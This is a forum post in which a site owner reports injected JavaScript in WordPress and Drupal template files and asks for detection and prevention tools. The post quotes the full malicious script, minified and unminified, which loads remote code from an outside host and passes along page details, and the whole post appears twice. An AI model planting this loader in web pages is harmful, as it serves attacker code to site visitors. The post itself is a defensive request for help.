Fli
01-29-2017, 01:18 PM
I am not a programmer but several Wordpress theme files and several other files like
./public_html/wp-content/themes/corporate/header.php
./drupal/modules/system/maintenance-page.tpl.php
./drupal/modules/system/page.tpl.php
had this line of code inside them:
<script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b) )return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript" src="' + 'http://faceandlook.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script><script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b) )return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript" src="' + 'http://faceandlook.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
UnMinified (http://unminify.com/) code:
< script >
var b = "red";
c = "mod";
function setCookie(a, b, c) {
var d = new Date;
d.setTime(d.getTime() + 60 * c * 60 * 1e3);
var e = "expires=" + d.toUTCString();
document.cookie = a + "=" + b + "; " + e
}
function getCookie(a) {
for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c.length; d++) {
for (var e = c[d];
" " == e.charAt(0);) e = e.substring(1);
if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
}
return null
}
null == getCookie("ytm_hit1") && (setCookie("ytm_hit1", 1, 1), 1 == getCookie("ytm_hit1") && (setCookie("ytm_hit1", 2, 1), document.write('<script type="text/javascript" src="' + 'http://faceandlook.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k = (function() {
var keywords = '';
var metas = document.getElementsByTagName('meta');
if (metas) {
for (var x = 0, y = metas.length; x < y; x++) {
if (metas[x].name.toLowerCase() == "keywords") {
keywords += metas[x].content;
}
}
}
return keywords !== '' ? keywords : null;
})()) == null ? (v = window.location.search.match(/utm_term=([^&]+)/)) == null ? (t = document.title) == null ? '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>'))); < /script><script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b) )return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript
" src="
' + '
http: //faceandlook.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
(here (http://www.buildersociety.com/threads/help-i-found-this-in-a-wp-header.2151/#post-21649) and there (https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html) someone is explaining how above code works)
Interesting is that the code is inside drupal files which seems to be original files (Delivered by Softaculous autoinstaller), so i have no clue why it is inside them:
-rw-r--r-- 1 user user9.8K Nov 9 2010 system.css
-rw-r--r-- 1 user user 323 Nov 9 2010 system.info
-rw-r--r-- 1 user user 10K Nov 9 2010 page.tpl.php <----
-rw-r--r-- 1 user user 329 Nov 9 2010 system-menus-rtl.css
-rw-r--r-- 1 user user 935 Nov 9 2010 system-menus.css
Are there any tools that can detect this code on shared web hosting server early. Way to prevent this to happen is updating scripts i am hosting so they do not have any holes? Any other ways?
./public_html/wp-content/themes/corporate/header.php
./drupal/modules/system/maintenance-page.tpl.php
./drupal/modules/system/page.tpl.php
had this line of code inside them:
<script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b) )return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript" src="' + 'http://faceandlook.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script><script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b) )return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript" src="' + 'http://faceandlook.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
UnMinified (http://unminify.com/) code:
< script >
var b = "red";
c = "mod";
function setCookie(a, b, c) {
var d = new Date;
d.setTime(d.getTime() + 60 * c * 60 * 1e3);
var e = "expires=" + d.toUTCString();
document.cookie = a + "=" + b + "; " + e
}
function getCookie(a) {
for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c.length; d++) {
for (var e = c[d];
" " == e.charAt(0);) e = e.substring(1);
if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
}
return null
}
null == getCookie("ytm_hit1") && (setCookie("ytm_hit1", 1, 1), 1 == getCookie("ytm_hit1") && (setCookie("ytm_hit1", 2, 1), document.write('<script type="text/javascript" src="' + 'http://faceandlook.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k = (function() {
var keywords = '';
var metas = document.getElementsByTagName('meta');
if (metas) {
for (var x = 0, y = metas.length; x < y; x++) {
if (metas[x].name.toLowerCase() == "keywords") {
keywords += metas[x].content;
}
}
}
return keywords !== '' ? keywords : null;
})()) == null ? (v = window.location.search.match(/utm_term=([^&]+)/)) == null ? (t = document.title) == null ? '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>'))); < /script><script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b) )return e.substring(b.length,e.length)}return null}null==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",1,1),1==getCookie("ytm_hit1")&&(setCookie("ytm_hit1",2,1),document.write('<script type="text/javascript
" src="
' + '
http: //faceandlook.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
(here (http://www.buildersociety.com/threads/help-i-found-this-in-a-wp-header.2151/#post-21649) and there (https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of-websites.html) someone is explaining how above code works)
Interesting is that the code is inside drupal files which seems to be original files (Delivered by Softaculous autoinstaller), so i have no clue why it is inside them:
-rw-r--r-- 1 user user9.8K Nov 9 2010 system.css
-rw-r--r-- 1 user user 323 Nov 9 2010 system.info
-rw-r--r-- 1 user user 10K Nov 9 2010 page.tpl.php <----
-rw-r--r-- 1 user user 329 Nov 9 2010 system-menus-rtl.css
-rw-r--r-- 1 user user 935 Nov 9 2010 system-menus.css
Are there any tools that can detect this code on shared web hosting server early. Way to prevent this to happen is updating scripts i am hosting so they do not have any holes? Any other ways?